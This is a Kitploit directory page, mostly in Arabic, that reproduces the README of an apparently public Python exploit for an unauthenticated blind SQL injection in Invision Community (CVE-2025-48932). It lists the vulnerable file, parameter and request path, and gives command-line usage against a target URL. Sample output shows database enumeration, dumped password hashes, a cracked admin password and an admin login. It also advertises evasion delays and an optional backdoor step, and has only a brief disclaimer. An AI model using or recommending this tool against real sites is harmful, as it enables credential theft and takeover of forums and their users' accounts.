Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-48932-Invision-Community-SQLi-Exploit — CVE-2025-48932 - استغلال حقن SQL غير مصادق عليه لـ Invision Community ≤ 4.7.20. استغلال آلي بالكامل مع تعداد قاعدة البيانات، وسرقة بيانات الاعتماد، والاستيلاء على المسؤول، واختطاف الجلسة، وتعدد الخيوط. لا يتطلب تبعيات. أداة بحث أمني من Sudeepa Wanigarathna | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/cve-2025-48932-invision-community-sqli-exploit
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتجمع المعلوماتما بعد الاستغلالأمن الويباختبار الاختراق

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubcerberusmrxi/cve-2025-48932-invision-community-sqli-exploit

CVE-2025-48932-Invision-Community-SQLi-Exploit

CVE-2025-48932 - استغلال حقن SQL غير مصادق عليه لـ Invision Community ≤ 4.7.20. استغلال آلي بالكامل مع تعداد قاعدة البيانات، وسرقة بيانات الاعتماد، والاستيلاء على المسؤول، واختطاف الجلسة، وتعدد الخيوط. لا يتطلب تبعيات. أداة بحث أمني من Sudeepa Wanigarathna

عرض المستودع
118منذ 2 أشهرلم تتم المراجعة بعد

🔓 CVE-2025-48932 - استغلال حقن SQL في Invision Community

Python Version License Security Status CVE Exploit-DB PRs Welcome Maintenance Hits


⚡ نظرة عامة على الثغرة الحرجة

CVE-2025-48932 هي ثغرة حقن SQL أعمى حرجة بدون مصادقة تم اكتشافها في Invision Community الإصدارات ≤ 4.7.20. يسمح هذا الاستغلال للمهاجمين عن بُعد بما يلي:

  • 🔍 استخراج معلومات حساسة من قاعدة البيانات
  • 👤 سرقة بيانات اعتماد المستخدمين وتجزئات كلمات المرور
  • 🔑 الاستيلاء على حسابات المسؤولين
  • 🎯 اختطاف جلسات المستخدمين النشطة
  • 💻 تحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE) عبر الاستيلاء على حساب المسؤول
  • 📊 تفريغ محتويات قاعدة البيانات بالكامل

🎯 الميزات

الميزةالوصفالحالة
🚀 بدون أي تبعياتمكتبة Python القياسية فقط - لا حاجة للتثبيت عبر pip✅
⚡ متعدد الخيوطاستخراج بيانات فائق السرعة مع خيوط قابلة للتهيئة✅
🤖 آلي بالكاملسلسلة استغلال كاملة من الاكتشاف إلى إعداد التقارير✅
👑 الاستيلاء على حساب المسؤولاختطاف الجلسات وتصعيد الامتيازات✅
🔑 تفريغ بيانات الاعتماداستخراج المستخدمين وتجزئات كلمات المرور والبريد الإلكتروني✅
🔓 كسر كلمات المروركسر تجزئات مدمج مع دعم قوائم الكلمات✅
📋 تقارير JSONمخرجات منظمة للتحليل والتوثيق✅
🔌 دعم البروكسيتكامل مع Burp Suite والبروكسيات المخصصة✅
🎨 مخرجات ملونةمخرجات طرفية جميلة مع مؤشرات التقدم✅
🛡️ تحديد المعدلتأخيرات مدمجة لتجنب الاكتشاف✅

📊 العرض التوضيحي ولقطات الشاشة

تنفيذ الاستغلال

$ python3 exploit.py -u https://vulnerable-site.com -v

╔══════════════════════════════════════════════════════════════════╗
║  CVE-2025-48932 - Invision Community SQL Injection               ║
║  Author: Sudeepa Wanigarathna                                    ║
║  Critical: Unauthenticated Remote Code Execution                 ║
╚══════════════════════════════════════════════════════════════════╝

[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!

[*] Enumerating database information...
[+] Database Information:
  Version: 10.4.32-MariaDB
  User: invision@localhost
  Database: invision_community
  Hostname: localhost
  Basedir: /usr/
  Datadir: /var/lib/mysql/

[*] Enumerating databases...
[+] Found 5 databases
  Found: information_schema
  Found: invision_community
  Found: mysql
  Found: performance_schema
  Found: phpmyadmin

[*] Enumerating tables in invision_community...
[+] Found 12 tables
  Found: core_members
  Found: core_sessions
  Found: admin_members
  Found: cms_categories
  Found: forums_posts
  ...

[*] Searching for credentials...
[+] Found credential table: core_members
  Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
  Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
  Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...

[*] Extracting admin information...
[+] Admin Information Found:
  name: admin
  email: [email protected]
  id: 1
  password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...

[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!

[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!

[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json

نموذج مخرجات JSON

{
  "target": "https://vulnerable-site.com",
  "timestamp": "2026-08-02T12:34:56.789Z",
  "vulnerable": true,
  "database": {
    "version": "10.4.32-MariaDB",
    "user": "invision@localhost",
    "database": "invision_community",
    "hostname": "localhost"
  },
  "databases": [
    "information_schema",
    "invision_community",
    "mysql",
    "performance_schema",
    "phpmyadmin"
  ],
  "tables": [
    "core_members",
    "core_sessions",
    "admin_members"
  ],
  "credentials": [
    {
      "username": "admin",
      "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
      "email": "[email protected]"
    }
  ],
  "admin_info": {
    "name": "admin",
    "email": "[email protected]",
    "id": "1",
    "password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
  },
  "summary": {
    "total_databases": 5,
    "total_tables": 12,
    "total_credentials": 3,
    "vulnerable": true,
    "successful": true
  }
}

🚀 دليل البدء السريع

التثبيت

# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit

# No dependencies to install! Just run it.

الاستخدام الأساسي

# Check if target is vulnerable
python3 exploit.py -u https://example.com --check-only

# Full exploitation with verbose output
python3 exploit.py -u https://example.com -v

# With proxy (Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v

# Save results to custom file
python3 exploit.py -u https://example.com -o results.json

# Multi-threaded extraction (faster)
python3 exploit.py -u https://example.com -t 10

# Dump all available data
python3 exploit.py -u https://example.com --dump-all

الاستخدام المتقدم

# With custom wordlist for password cracking
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v

# Silent mode (no output, just report)
python3 exploit.py -u https://example.com -o silent_report.json

# Debug mode with detailed errors
python3 exploit.py -u https://example.com -v --debug

📋 المتطلبات

متطلبات النظام

  • Python: 3.6 أو أحدث
  • نظام التشغيل: Linux وWindows وmacOS (أي نظام تشغيل يدعم Python)
  • الذاكرة: ضئيلة (~50 ميجابايت رام)
  • التخزين: ~100 كيلوبايت (الاستغلال فقط)

التبعيات

✅ No external dependencies!
✅ Pure Python standard library only!
✅ No pip install or virtual environment needed!

اختياري (لكسر كلمات المرور)

  • قائمة الكلمات: rockyou.txt أو أي قائمة كلمات مخصصة
    # Download popular wordlist
    wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    

🛠️ التفاصيل التقنية

موقع الثغرة

  • الملف: /applications/calendar/modules/front/calendar/view.php
  • الدالة: IPS\calendar\modules\front\calendar\view::search()
  • المعامل: location (مدخلات يقدمها المستخدم)
  • النوع: حقن SQL أعمى قائم على الاستجابة المنطقية (Boolean-based Blind SQL Injection)

ناقل الهجوم

GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]

سلسلة الاستغلال

  1. الاكتشاف: كشف الحقن القائم على الاستجابة المنطقية
  2. التعداد: استخراج بنية قاعدة البيانات
  3. الاستخراج: تفريغ البيانات الحساسة
  4. سرقة بيانات الاعتماد: استخراج بيانات اعتماد المستخدمين
  5. تصعيد الامتيازات: الاستيلاء على حساب المسؤول
  6. اختطاف الجلسات: سرقة الجلسات النشطة
  7. الثبات: إنشاء باب خلفي (اختياري)

إصدارات قواعد البيانات المدعومة

  • MySQL 5.0+
  • MariaDB 5.5+
  • Percona Server

🔒 إشعار الأمان والقانون

⚠️ إخلاء مسؤولية هام

هذه الأداة لأغراض تعليمية واختبارية مصرّح بها فقط.

تنزيل الأداة